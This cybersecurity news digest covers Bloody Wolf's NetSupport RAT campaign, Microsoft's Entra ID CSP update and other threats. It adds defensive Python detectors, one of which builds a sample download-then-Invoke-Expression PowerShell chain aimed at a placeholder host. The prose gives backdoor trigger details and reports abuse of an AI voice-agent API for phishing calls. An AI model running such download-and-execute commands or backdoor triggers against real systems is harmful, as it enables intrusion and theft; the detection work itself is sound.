2025-11-28 AI Startup News

Bloody Wolf Expands Java-based NetSupport RAT Attacks in Kyrgyzstan and Uzbekistan

The threat actor known as Bloody Wolf has been attributed to a cyber attack campaign that has targeted Kyrgyzstan since at least June 2025 with the goal of delivering NetSupport RAT. As of October 2025, the activity has expanded to also single out Uzbekistan, Group-IB researchers Amirbek Kurbanov and Volen Kayo said in a report published in collaboration with Ukuk, a state enterprise under the Prosecutor General’s office of the Kyrgyz Republic. The attacks have targeted finance, government, and information technology (IT) sectors. “Those threat actors would impersonate the [Kyrgyzstan’s] Ministry of Justice through official looking PDF documents and domain names, which in turn hosted malicious Java Archive (JAR) files designed to deploy the NetSupport RAT,” the Singapore-headquartered company said.

“This combination of social engineering and accessible tooling allows Bloody Wolf to remain effective while keeping a low operational profile.” Bloody Wolf is the name assigned to a hacking group of unknown provenance that has used spear-phishing attacks to target entities in Kazakhstan and Russia using tools like STRRAT and NetSupport. The group is assessed to be active since at least late 2023. The targeting of Kyrgyzstan and Uzbekistan using similar initial access techniques marks an expansion of the threat actor’s operations in Central Asia, primarily impersonating trusted government ministries in phishing emails to distribute weaponized links or attachments. The attack chains more or less follow the same approach in that the message recipients are tricked into clicking on links that download malicious Java archive (JAR) loader files along with instructions to install Java Runtime.

While the email claims the installation is necessary to view the documents, the reality is that it’s used to execute the loader. Once launched, the loader then proceeds to fetch the next-stage payload (i.e., NetSupport RAT) from infrastructure that’s under the attacker’s control and set up persistence in three ways:

- Creating a scheduled task
- Adding a Windows Registry value
- Dropping a batch script to the folder “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup”

The Uzbekistan phase of the campaign is notable for incorporating geofencing restrictions, thereby causing requests originating outside of the country to be redirected to the legitimate data.egov[.]uz website. Requests from within Uzbekistan have been found to trigger the download of the JAR file from an embedded link within the PDF attachment. Group-IB said the JAR loaders observed in the campaigns are built with Java 8, which was released in March 2014.
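The three persistence locations named above (scheduled tasks, a Registry Run value, and a batch script in the Startup folder) are exactly where a defender would look for a Java-based loader. The Python below is an added example, not code from the Group-IB report: it triages constructed samples of those three artifact types and flags any entry that launches a Java runtime with a JAR argument. The sample task, Run-key and Startup-folder entries are constructed here for illustration, and the regular expressions are generic heuristics rather than indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Generic heuristics (constructed for this example, not campaign indicators):
# a Java launcher (java/javaw, with or without .exe) together with a .jar path.
JAVA_LAUNCHER = re.compile(r"\bjavaw?(?:\.exe)?\b", re.IGNORECASE)
JAR_REF = re.compile(r"\S+\.jar\b", re.IGNORECASE)


@dataclass
class Finding:
    source: str    # "scheduled_task", "run_key" or "startup_folder"
    name: str      # task name, Registry value name or file name
    command: str   # the command line that triggered the finding


def looks_like_java_loader(command):
    """True when a command line launches Java with a JAR argument."""
    return bool(JAVA_LAUNCHER.search(command) and JAR_REF.search(command))


def find_java_loader_persistence(tasks, run_values, startup_files):
    """Scan the three persistence locations and return a list of Finding objects.

    tasks         -> {task name: command line}
    run_values    -> {Run value name: command line}
    startup_files -> {file name in the Startup folder: file content}
    """
    findings = []
    for name, cmd in tasks.items():
        if looks_like_java_loader(cmd):
            findings.append(Finding("scheduled_task", name, cmd))
    for name, cmd in run_values.items():
        if looks_like_java_loader(cmd):
            findings.append(Finding("run_key", name, cmd))
    for fname, content in startup_files.items():
        # Batch files are checked line by line so the java call is caught
        # even when it is not on the first line of the script.
        for line in content.splitlines():
            if looks_like_java_loader(line):
                findings.append(Finding("startup_folder", fname, line.strip()))
                break
    return findings


# Constructed sample data: one benign and one suspicious entry per location.
SAMPLE_TASKS = {
    "MicrosoftEdgeUpdateTaskMachineCore":
        r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c',
    "UpdateCheck":
        r'"C:\Program Files\Java\jre1.8.0_45\bin\javaw.exe" -jar "C:\Users\Public\update.jar"',
}
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "JavaUpdate": r'javaw -jar %APPDATA%\sys.jar',
}
SAMPLE_STARTUP_FILES = {
    "desktop.ini": "[.ShellClassInfo]\nLocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21787",
    "update.bat": "@echo off\ncd %APPDATA%\nstart \"\" javaw.exe -jar loader.jar\n",
}

if __name__ == "__main__":
    for f in find_java_loader_persistence(SAMPLE_TASKS, SAMPLE_RUN_VALUES, SAMPLE_STARTUP_FILES):
        print(f"[{f.source}] {f.name}: {f.command}")
```

On a live host the three dictionaries would be filled from `schtasks /query /xml`, the `HKCU\...\CurrentVersion\Run` values and the Startup folder listing; the matching logic is the same, and an entry that invokes a JAR from a user-writable path such as `%APPDATA%` or `C:\Users\Public` deserves a closer look.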

It’s believed that the attackers are using a bespoke JAR generator or template to spawn these artifacts. The NetSupport RAT payload is an old version of NetSupport Manager from October 2013. “Bloody Wolf has demonstrated how low-cost, commercially available tools can be weaponized into sophisticated, regionally targeted cyber operations,” it said. “By exploiting trust in government institutions and leveraging simple JAR-based loaders, the group continues to maintain a strong foothold across the Central Asian threat landscape.”


Microsoft to Block Unauthorized Scripts in Entra ID Logins with 2026 CSP Update

Microsoft has announced plans to improve the security of Entra ID authentication by blocking unauthorized script injection attacks starting a year from now. The update to its Content Security Policy (CSP) aims to enhance the Entra ID sign-in experience at “login.microsoftonline[.]com” by only letting scripts from trusted Microsoft domains run. “This update strengthens security and adds an extra layer of protection by allowing only scripts from trusted Microsoft domains to run during authentication, blocking unauthorized or injected code from executing during the sign-in experience,” the Windows maker said. Specifically, it only allows script downloads from Microsoft trusted CDN domains and inline script execution from a Microsoft trusted source.

The updated policy is limited to browser-based sign-in experiences for URLs beginning with login.microsoftonline.com. Microsoft Entra External ID will not be affected. The change, which has been described as a proactive measure, is part of Microsoft’s Secure Future Initiative ( SFI ) and is designed to safeguard users against cross-site scripting (XSS) attacks that make it possible to inject malicious code into websites. It’s expected to be rolled out globally starting mid-to-late October 2026.

Microsoft is urging organizations to test their sign-in flows thoroughly ahead of time to ensure that there are no issues and the sign-in experience has no friction. It’s also advising customers to refrain from using browser extensions or tools that inject code or script into the Microsoft Entra sign-in experience. Those who currently rely on such tools are recommended to switch to alternatives that don’t inject code. To identify any CSP violations, users can go through a sign-in flow with the browser’s developer tools open and check the Console tool for errors that say “Refused to load the script” for violating the “script-src” and “nonce” directives.
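To make the CSP mechanics behind those “Refused to load the script” errors concrete, here is an added Python example (not Microsoft’s code). It parses a Content-Security-Policy header and decides whether a given external or inline script passes `script-src`: a host source such as `https://*.cdn.example.com` admits scripts from matching hosts, a matching `'nonce-…'` admits a script regardless of origin, and the presence of a nonce disables `'unsafe-inline'`. `SAMPLE_POLICY` and `PAGE_ORIGIN` are constructed stand-ins, not the real policy served at login.microsoftonline.com; ports and `'strict-dynamic'` are deliberately ignored to keep the matcher short.

```python
from urllib.parse import urlparse

# Constructed sample policy in the shape described in the article: external scripts
# only from a trusted CDN pattern and the login host, inline scripts only with the
# nonce. This is NOT Microsoft's real policy for login.microsoftonline.com.
SAMPLE_POLICY = (
    "default-src 'self'; "
    "script-src 'nonce-r4nd0mN0nc3' https://*.cdn.example.com https://login.example.com; "
    "object-src 'none'"
)
PAGE_ORIGIN = "https://login.example.com"  # constructed origin of the sign-in page

HASH_OR_NONCE = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header):
    """Split a CSP header into {directive-name: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _origin(url):
    p = urlparse(url)
    port = f":{p.port}" if p.port else ""
    return f"{p.scheme}://{p.hostname}{port}"


def _host_source_matches(source, url, page_origin):
    """Match one source expression ('self', https://host, https://*.host) against a URL.
    Keyword, nonce and hash sources are not host sources and never match here."""
    if source == "'self'":
        return _origin(url) == page_origin
    if source.startswith("'"):
        return False
    target = urlparse(url)
    src = urlparse(source if "://" in source else f"{target.scheme}://{source}")
    if src.scheme != target.scheme:
        return False
    host = (src.hostname or "").lower()
    target_host = (target.hostname or "").lower()
    if host.startswith("*."):
        # A wildcard needs at least one extra label: *.cdn.example.com does not
        # match cdn.example.com itself.
        return target_host.endswith(host[1:]) and target_host != host[2:]
    return target_host == host


def evaluate_script(policy, page_origin, src=None, nonce=None):
    """Return (allowed, reason) for a script under the policy. src=None means inline."""
    sources = policy.get("script-src")
    governing = "script-src"
    if sources is None:  # script-src absent: default-src governs
        sources = policy.get("default-src", [])
        governing = "default-src"
    directive_text = f"{governing} {' '.join(sources)}"

    # A matching nonce admits the script whether it is inline or external.
    if nonce is not None and f"'nonce-{nonce}'" in sources:
        return True, f"nonce matches {governing}"

    if src is None:
        # 'unsafe-inline' is ignored by browsers when a nonce or hash is present.
        has_nonce_or_hash = any(s.startswith(HASH_OR_NONCE) for s in sources)
        if "'unsafe-inline'" in sources and not has_nonce_or_hash:
            return True, "'unsafe-inline' permits inline script"
        return False, f"Refused to execute inline script because it violates \"{directive_text}\""

    if "*" in sources or any(_host_source_matches(s, src, page_origin) for s in sources):
        return True, f"host source in {governing} permits {src}"
    return False, f"Refused to load the script '{src}' because it violates \"{directive_text}\""


if __name__ == "__main__":
    policy = parse_csp(SAMPLE_POLICY)
    cases = [
        {"src": "https://static.cdn.example.com/app.js"},      # trusted CDN: allowed
        {"src": "https://attacker.example.net/inject.js"},     # injected: refused
        {"nonce": "r4nd0mN0nc3"},                               # inline with nonce: allowed
        {},                                                     # inline without nonce: refused
    ]
    for case in cases:
        print(evaluate_script(policy, PAGE_ORIGIN, **case))
```

Run against a real header, the same evaluator tells you in advance which of your extension-injected scripts the browser will refuse once the policy is enforced, which is the pre-flight check Microsoft is asking organizations to perform.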

Microsoft’s SFI is a multi-year effort that seeks to put security above all else when designing new products and better prepare for the growing sophistication of cyber threats. It was first launched in November 2023 and expanded in May 2024 following a report from the U.S. Cyber Safety Review Board (CSRB), which concluded that the company’s “security culture was inadequate and requires an overhaul.” In its third progress report published this month, the tech giant said it has deployed over 50 new detections in its infrastructure to target high-priority tactics, techniques, and procedures, and that the adoption of phishing-resistant multi-factor authentication (MFA) for users and devices has hit 99.6%. Other notable changes enacted by Microsoft are as follows:

- Enforced mandatory MFA across all services, including for all Azure service users
- Introduced automatic recovery capabilities via Quick Machine Recovery, expanded passkey and Windows Hello support, and improved memory safety in UEFI firmware and drivers by using Rust
- Migrated 95% of Microsoft Entra ID signing VMs to Azure Confidential Compute and moved 94.3% of Microsoft Entra ID security token validation to its standard identity Software Development Kit (SDK)
- Discontinued the use of Active Directory Federation Services (ADFS) in its productivity environment
- Decommissioned 560,000 additional unused and aged tenants and 83,000 unused Microsoft Entra ID apps across Microsoft production and productivity environments
- Advanced threat hunting by centrally tracking 98% of production infrastructure
- Achieved complete network device inventory and mature asset lifecycle management
- Almost entirely locked code signing to production identities
- Published 1,096 CVEs, including 53 no-action cloud CVEs, and paid out $17 million in bounties

“To align with Zero Trust principles, organizations should automate vulnerability detection, response, and remediation using integrated security tools and threat intelligence,” Microsoft said.

“Maintaining real-time visibility into security incidents across hybrid and cloud environments enables faster containment and recovery.”

Webinar: Learn to Spot Risks and Patch Safely with Community-Maintained Tools

If you’re using community tools like Chocolatey or Winget to keep systems updated, you’re not alone. These platforms are fast, flexible, and easy to work with—making them favorites for IT teams. But there’s a catch… The very tools that make your job easier might also be the reason your systems are at risk.

These tools are run by the community. That means anyone can add or update packages. Some packages may be old, missing safety checks, or changed by mistake or on purpose. Hackers look for these weak spots.

This has already happened in places like NPM and PyPI. The same risks can happen with Windows tools too. To help you patch safely without slowing down, there’s a free webinar coming up. It’s led by Gene Moody, Field CTO at Action1.

He’ll walk through how these tools work, where the risks are, and how to protect your systems while keeping updates on track. In this session, he’ll test how safe these tools really are. You’ll get practical steps you can use right away—nothing theoretical, just what works. The goal is not to scare you away from community tools.

They’re useful. But they need guardrails—rules that help you use them safely without slowing you down. You will learn:

🔒 How to spot hidden risks
⚙️ How to set safety checks like source pinning, allow-lists, and hash/signature verification
📊 How to prioritize updates using known vulnerability data (KEV)
📦 How to choose between community tools, direct vendor sources, or a mix of both

If you’re not sure when to use community repos and when to go straight to the vendor, this session will help you decide. You’ll also see how to mix both in a safe way.

This webinar is for anyone who manages software updates—whether you’re on a small team or a large one. If you’ve ever wondered what’s really inside that next patch, this session is for you. It’s free to attend, and you’ll leave with clear actions you can apply the same day. Save your spot here.

This article is a contributed piece from one of our valued partners.

Hackers have been busy again this week. From fake voice calls and AI-powered malware to huge money-laundering busts and new scams, there’s a lot happening in the cyber world. Criminals are getting creative — using smart tricks to steal data, sound real, and hide in plain sight. But they’re not the only ones moving fast.

Governments and security teams are fighting back, shutting down fake networks, banning risky projects, and tightening digital defenses. Here’s a quick look at what’s making waves this week — the biggest hacks, the new threats, and the wins worth knowing about.

Mirai-based malware resurfaces with new IoT campaign

ShadowV2 Botnet Continues to Target IoT Devices

The threat actors behind the Mirai-based ShadowV2 botnet have been observed infecting IoT devices across industries and continents. The campaign is said to have been active only during the Amazon Web Services (AWS) outage in late October 2025.

It’s assessed that the activity was “likely a test run conducted in preparation for future attacks,” per Fortinet. The botnet exploited several flaws, including CVE-2009-2765 (DDWRT), CVE-2020-25506, CVE-2022-37055, CVE-2024-10914, CVE-2024-10915 (D-Link), CVE-2023-52163 (DigiEver), CVE-2024-3721 (TBK), and CVE-2024-53375 (TP-Link), to recruit susceptible gear into a zombie army of IoT devices. A successful exploitation is followed by the execution of a downloader shell script that delivers the ShadowV2 malware for subsequent DDoS attacks. “IoT devices remain a weak link in the broader cybersecurity landscape,” the company said.

“The evolution of ShadowV2 suggests a strategic shift in the targeting behavior of threat actors toward IoT environments.” It’s not just ShadowV2. Another DDoS botnet named RondoDox, also based on Mirai, has weaponized over a dozen exploits to target IoT devices. “Attackers are not only motivated to target vulnerable IoT devices, but also how, if successful, they will take over previously infected devices to add them to their own botnets,” F5 said.

Singapore tightens messaging rules to fight spoof scams

Singapore Orders Apple and Google to Block Messages that Spoof Government Orgs

Singapore has ordered Apple and Google to block or filter messages on iMessage and the RCS-supported Messages app for Android that masquerade as government agencies, requiring the companies to implement new anti-spoofing protections starting December 2025 as part of efforts to curb rising online scams.

According to Straits Times, Apple has been issued a directive under the Online Criminal Harms Act, requiring the tech giant to prevent iMessage accounts and group chats from using names that mimic Singapore government agencies or the “gov.sg” sender ID.

Tor bolsters privacy with new encryption upgrade

Tor Switches to New Counter Galois Onion Relay Encryption Algorithm

The developers behind the Tor project are preparing a major upgrade called Counter Galois Onion (CGO), which replaces the long-standing relay encryption method used across the anonymity network. “It’s based on a kind of construction called a Rugged Pseudorandom Permutation (RPRP): essentially, it’s a design for a wide-block cipher that resists malleability in one direction (for the encrypt operation, but not the decrypt operation),” the Tor Project said. “If we deploy this so that clients always decrypt and relays always encrypt, then we have a tagging-resistant cipher at less cost than a full SPRP [strong pseudorandom permutation]!” The updates aim to raise the cost of active attacks along a circuit, such as tagging and traffic-interception attacks, as well as prevent bad actors from tampering with encrypted traffic, add forward secrecy, and make the network more resilient.

Report shows surge in phishing during 2025 shopping season

Kaspersky Flags 6.4 Million Phishing Attacks in 2025

Kaspersky said it identified nearly 6.4 million phishing attacks, which targeted users of online stores, payment systems, and banks in the first ten months of 2025. “As many as 48.2% of these attacks were directed at online shoppers,” it said, adding it “detected more than 2 million phishing attacks related to online gaming” and “blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.”

Stealthy malware targets OpenFind mail servers

ESET Finds New QuietEnvelope Malware

ESET has disclosed details of a new toolset dubbed QuietEnvelope that’s specifically developed to target the MailGates email protection system of OpenFind email servers. The toolset comprises Perl scripts and three stealthy backdoors, among other miscellaneous files. “The Perl scripts are mainly responsible for deploying three passive backdoors as a loadable kernel module (LKM), an Apache module, and an injected shellcode,” ESET said.

“Together, they enable the attackers to have remote access to a compromised server.” The LKM component (“smtp_backdoor”) monitors ingress TCP traffic on port 6400 and triggers when packets contain the magic string EXEC_OPENFIND to execute the command. “The Apache module expects the command, which is executed via popen, in the custom HTTP header OpenfindMaster,” it added. “The third backdoor is injected into a running mgsmtpd process. It is capable of retrieving file content and executing commands.

By default, it responds with 250 OK, suggesting that the backdoor is hooked into the code that is maybe responsible for generating the SMTP response.” The tool is believed to be the work of an unknown state-sponsored threat actor, given the sophistication and its ability to blend in. ESET said it found debug strings written in simplified Chinese, which is mainly used in Mainland China.

Russia-linked hackers abuse MSC flaw for stealthy infection

Water Gamayun Exploits MSC EvilTwin Flaw

A Bing search for “belay” leads to the website “belaysolutions[.]com,” which is said to have been compromised with malicious JavaScript that performs a silent redirect to “belaysolutions[.]link” that hosts a double-extension RAR payload disguised as a PDF. Opening the initial payload exploits MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, ultimately leading to the deployment of a loader executable that’s capable of installing backdoors or stealers.

“When run, mmc.exe resolves MUI paths that load the malicious snap-in instead of the legitimate one, triggering embedded TaskPad commands with an encoded PowerShell payload,” Zscaler said. “Decoded via -EncodedCommand, this script downloads UnRAR[.]exe and a password-protected RAR, extracts the next stage, waits briefly, then Invoke-Expression on the extracted script.” The second script displays a decoy PDF and downloads and executes the loader binary. The exact nature of the payload is unclear due to the fact that the command-and-control (C2) infrastructure is unresponsive. The attack chain has been attributed to a Russia-aligned APT group known as Water Gamayun (aka EncryptHub).
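The `-EncodedCommand` step is the point where a detection engineer gets the most leverage: the argument is Base64 over a UTF-16LE string, so it must be decoded before any content matching on process telemetry. The Python below is an added example, not Zscaler’s tooling. It recognises the switch prefixes PowerShell accepts for `-EncodedCommand` (`-e`, `-enc`, and so on), decodes the blob, and runs a few illustrative indicator checks over both the outer command line and the decoded script. The sample command line is constructed inside the block from a harmless-looking script that points at a placeholder `.invalid` host; the indicator regexes are examples, not a vetted rule set.

```python
import base64
import re


def _is_encoded_switch(token):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand, from -e upward."""
    name = token.lower()
    if not name or name[0] not in "-/":
        return False
    name = name[1:]
    return bool(name) and name.startswith("e") and "encodedcommand".startswith(name)


def decode_encoded_command(cmdline):
    """Return the decoded script of a -EncodedCommand invocation, or None if absent/invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            blob = tokens[i + 1].strip("\"'")
            try:
                # PowerShell encodes the script as UTF-16LE before Base64.
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None
    return None


# Illustrative indicators (constructed for this example), checked against the
# outer command line plus the decoded script.
SUSPICIOUS = {
    "Invoke-Expression": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.IGNORECASE),
    "web download": re.compile(
        r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|\bcurl\b|\bwget\b",
        re.IGNORECASE),
    "archive tool": re.compile(r"\bunrar\b|\.rar\b", re.IGNORECASE),
    "delay before execution": re.compile(r"Start-Sleep", re.IGNORECASE),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
}


def analyze_command_line(cmdline):
    """Decode any encoded payload and report which indicators fire."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits}


# Constructed sample: a download, a short wait, then Invoke-Expression of a second
# stage, mirroring the sequence described in the write-up. The host is a placeholder.
SAMPLE_SCRIPT = (
    "Invoke-WebRequest -Uri https://example.invalid/unrar.exe -OutFile $env:TEMP\\unrar.exe; "
    "Start-Sleep -Seconds 3; "
    "Invoke-Expression (Get-Content $env:TEMP\\stage2.ps1 -Raw)"
)


def build_sample_cmdline(script=SAMPLE_SCRIPT):
    """Encode a script the way PowerShell expects for -EncodedCommand (constructed input)."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -WindowStyle Hidden -enc {blob}"


if __name__ == "__main__":
    for cmd in (build_sample_cmdline(),
                r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"):
        result = analyze_command_line(cmd)
        print(result["encoded"], result["indicators"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Fed with process-creation events (Sysmon Event ID 1 or EDR telemetry), the decode step turns an opaque Base64 argument back into searchable text, so the same indicator checks that work on plain command lines also catch the encoded variant.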

NCA uncovers crypto laundering tied to Russian sanctions evasion

U.K. Exposes Billion-Dollar Money Laundering Network

The U.K. has exposed two companies, Smart and TGR, which laundered money from cybercrime, drugs trade, firearms smuggling, and immigration crime for a fee, to create “clean” cryptocurrency that the Russian state could then use to evade international sanctions. The National Crime Agency (NCA) said the two entities acquired a bank in Kyrgyzstan to pose as legitimate operations.

The network is known to operate in at least 28 U.K. cities and towns. “Smart and TGR collaborated to launder money for transnational crime groups involved in cybercrime, drugs, and firearms smuggling,” the NCA said. “They also helped their Russian clients to illegally bypass financial restrictions to invest money in the U.K., threatening the integrity of our economy.”

Defender update removes lingering malicious invites

Microsoft Takes Action on Malicious Calendar Invites

Microsoft said it has updated Defender for Office 365 to help security teams remove calendar entries automatically created by Outlook during email delivery.

While remediation actions such as Move to Junk, Delete, Soft Delete, and Hard Delete can be used to eliminate email threats from users’ inboxes, the actions did not touch the calendar entry created by the original invite. “With this update, we’re taking the first step toward closing that gap,” the company said. “Hard Delete will now also remove the associated calendar entry for any meeting invite email. This ensures threats are fully eradicated—not just from the inbox but also from the calendar—reducing the risk of user interaction with malicious content.”

Thailand cracks down on Worldcoin-style biometric collection

Thailand Bans World Iris Scans

Data regulators in Thailand have ordered TIDC Worldverse, which represents the Sam Altman-founded startup Tools for Humanity in the country, to stop the collection of iris biometrics in exchange for World (formerly Worldcoin) cryptocurrency payments.

It has also demanded the deletion of biometric data already collected from 1.2 million Thai citizens. The project has witnessed similar bans in Brazil, the Philippines, Indonesia, and Kenya.

21-year-old cybersecurity specialist detained over state criticism

Russia Arrests Tech Entrepreneur for Treason

Timur Kilin, a 21-year-old tech entrepreneur and cybersecurity specialist, was arrested in Moscow on treason charges late last week. While the details of the case are unknown, it’s suspected that Kilin may have attracted the attention of authorities after criticizing the state-backed messaging app Max and the government’s anti-cybercrime legislation.

Chinese-speaking group expands global smishing reach to Egypt

Smishing Triad Targets Egypt’s Financial Sector and Postal Services

Threat actors associated with the Smishing Triad have expanded their focus to target Egypt by setting up malicious domains impersonating major Egyptian service providers, including Fawry, the Egypt Post, and Careem. The Smishing Triad is a Chinese-speaking cybercriminal group specializing in large-scale smishing campaigns across the world using a phishing kit named Panda. “Beyond U.S. service impersonation, the smishing kit offers a wide range of international templates, including those that mimic prominent ISPs such as Du (U.A.E.),” Dark Atlas said.

“These templates are designed to harvest PII from victims across different regions, significantly expanding the campaign’s global reach.” Recently, Google filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against a massive Phishing-as-a-Service (PhaaS) platform called Lighthouse that has ensnared over 1 million users across 120 countries. Lighthouse is one of the PhaaS services used by the Smishing Triad. The PhaaS kits are primarily distributed through Telegram by a threat actor named Wang Duo Yu (@wangduoyu8).

Privacy service ends after ties to data broker controversy

Mozilla to Shut Down Monitor Plus

Mozilla has announced plans to shut down Monitor Plus, a service that allowed user data to be removed from data broker portals. The service will wind down on December 17, 2025. It was offered through a partnership with Onerep, a controversial company whose Belarusian CEO, Dimitri Shelest, was caught running dozens of people search engine services since 2010. “Mozilla Monitor’s free monitoring service will continue to provide real-time alerts and step-by-step guides to mitigate the risks of a data breach,” Mozilla said.

Phishing campaigns drop RATs on Russian corporate targets

NetMedved Targets Russian Firms with RATs

A new threat actor named NetMedved is targeting Russian companies with phishing emails containing ZIP archives that include a LNK file masquerading as a purchase request, along with other decoy documents. Opening the LNK file triggers a multi-stage infection sequence that drops NetSupport RAT. The activity, per Positive Technologies, was observed in mid-October 2025. The development comes as F6 detailed new attacks mounted by VasyGrek (aka Fluffy Wolf), a Russian-speaking e-crime actor known for striking Russian companies since 2016 to deliver remote access trojans (RATs) and stealer malware.

The latest set of attacks recorded between August and November 2025 involved the use of the Pay2Key ransomware, as well as malware developed by PureCoder, including PureCrypter, PureHVNC, and PureLogs Stealer.

Blockchain-hosted payloads deliver AMOS, Vidar, Lumma stealers

Attacks Exploit EtherHiding and ClickFix to Drop Infostealers

Threat actors are using legitimate websites compromised with malicious JavaScript injects to serve site visitors fake CAPTCHA checks that contain a Base64-encoded payload to display a ClickFix lure that’s appropriate for the operating system by using the EtherHiding technique. This involves hiding intermediate JavaScript payloads on the blockchain and using four smart contracts deployed on the Binance Smart Chain (BSC) to ensure that the victim is not a bot and direct them to an operating system (OS)-specific contract. However, the OS-specific JavaScript is delivered only after a call to a gate contract that responds either “yes” or another value.

“This gate provides the attacker with a remotely controlled feature flag,” Censys said. “By altering on-chain state, the operator can selectively enable or disable delivery for specific victims, throttle execution, or temporarily disable the entire campaign.” The payloads distributed throughout chains include common stealers like AMOS and Vidar. Similar drive-by compromise attacks have also been found to display counterfeit CAPTCHA verifications that leverage the ClickFix tactic to drop Lumma Stealer, according to NCC Group.

Microsoft links 13M phishing emails to top PhaaS operation

Tycoon 2FA Becomes the Most Active PhaaS Platform

Microsoft said the PhaaS toolkit known as Tycoon 2FA (aka Storm-1747) has emerged as the most prolific platform observed by the company this year.

In October 2025 alone, Microsoft Defender for Office 365 blocked more than 13 million malicious emails linked to Tycoon 2FA. “More than 44% of all CAPTCHA-gated phishing attacks blocked by Microsoft were attributed to Tycoon 2FA,” it said. “Tycoon2FA was also directly linked to nearly 25% of all QR code phishing attacks detected in October.” First discovered in 2023, Tycoon 2FA has evolved into a potent tool that leverages real-time Adversary-in-the-Middle (AitM) techniques to capture credentials, steal session tokens, and one-time codes. “The platform delivers high-fidelity phishing pages for Microsoft 365, Gmail, and Outlook, and has become a preferred tool among threat actors due to its subscription-based, low-barrier operational model,” CYFIRMA said.

Malware uses AI mimicry to bypass behavioral defenses

Xillen Stealer Updated to Evade AI Detection

A new version of Xillen Stealer has introduced advanced features to evade AI-based detection systems by mimicking legitimate users and adjusting CPU and memory usage to imitate normal apps. Its main goal is to steal credentials, cryptocurrency, and sensitive data across browsers, password managers, and cloud environments. It’s marketed on Telegram for anywhere between $99 to $599 per month. The latest iteration also includes code to use AI to detect high-value targets based on weighted indicators and relevant keywords defined in a dictionary.

These include cryptocurrency wallets, banking data, premium accounts, developer accounts, and business emails, along with location indicators that include high-value countries such as the U.S., the U.K., Germany, and Japan, and other cryptocurrency-friendly countries and financial hubs. While the feature is not fully implemented by its authors, Xillen Killers, the development shows how threat actors could be leveraging AI in future campaigns, Darktrace said.

FCC reverses course on telecom cybersecurity policy

FCC Scraps Telecom Cybersecurity Rules

The Federal Communications Commission (FCC) has scrapped a set of telecom cybersecurity rules introduced after the Salt Typhoon espionage campaign came to light last year to prevent state-sponsored hackers from breaching American carriers. The ruling came into effect in January 2025.

The course reversal comes after what the FCC said were “extensive, urgent, and coordinated efforts” from carriers to mitigate operational risks and better protect consumers. The action follows “months-long engagement with communications service providers where they have demonstrated a strengthened cybersecurity posture following Salt Typhoon,” the agency said, adding it has “taken a series of actions to harden communications networks and improve their security posture to enhance the agency’s investigative process into communications networks outages that result from cyber incidents.” This included establishing a Council on National Security and adopting rules to address cybersecurity risks to critical communications infrastructure without “imposing inflexible and ambiguous requirements.” However, the FCC’s announcement offers no details on how those improvements will be monitored or enforced.

Teen suspects deny charges in Transport for London hack

British Teens Plead Not Guilty to TfL Attack

Two British teenagers who were charged with Computer Misuse Act offenses over a cyber attack on Transport for London (TfL) last year pleaded not guilty during a court appearance last week. Thalha Jubair, 19, and Owen Flowers, 18, were arrested at their homes in East London and Walsall, respectively, by officers from the National Crime Agency (NCA) in September 2025.

Unpatched flaw lets AI voice agents enable large-scale scams

Security Flaw in Retell AI API

A security vulnerability has been disclosed in the Retell AI API, which creates AI voice agents that have excessive permissions and functionality. This stems from a lack of sufficient guardrails that causes its large language model (LLM) to deliver unintended outputs. An attacker could exploit this behavior to stage large-scale social engineering, phishing, and misinformation campaigns. “The vulnerability targets Retell AI’s ease of deployment and customizability to perform scalable phishing/social engineering attacks,” the CERT Coordination Center (CERT/CC) said.

“Attackers can feed publicly available resources as well as some instructions to Retell AI’s API to generate high-volume and automated fake calls. These fake calls could lead to unauthorized actions, security breaches, data leaks, and other forms of manipulation.” The issue remains unpatched.

Study shows cybercriminal job market mirrors real-world economy

What’s the Dark Web Job Market Like?

A new analysis from Kaspersky has revealed that the dark web continues to serve as a parallel labor market with its own rules, recruitment practices, and salary expectations, while also being influenced by current economic forces.

“The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work,” the company said. “At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers, and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.”

Android malware hides traffic behind hacked legitimate sites

Malicious Apps Use Compromised Legit Websites as C2

AhnLab said it discovered an Android APK malware (“com.golfpang.golfpanggolfpang”) impersonating a famous Korean delivery service, while taking steps to evade security controls using obfuscation and packing techniques.

The data stolen by the malware is exfiltrated to a breached legitimate site that’s used for C2. “When the app is launched, it requests the permissions required to perform malicious behaviors from the user,” AhnLab said. In a similar development, a malicious program disguised as SteamCleaner is being propagated via websites that advertise cracked software to deliver a Node.js script capable of communicating with a C2 server periodically and executing commands issued by the attacker. While it’s not known what commands are sent via the C2 channel, AhnLab said the activity could lead to the installation of proxyware and other payloads.

The counterfeit installers are hosted on GitHub repositories managed by the threat actor.

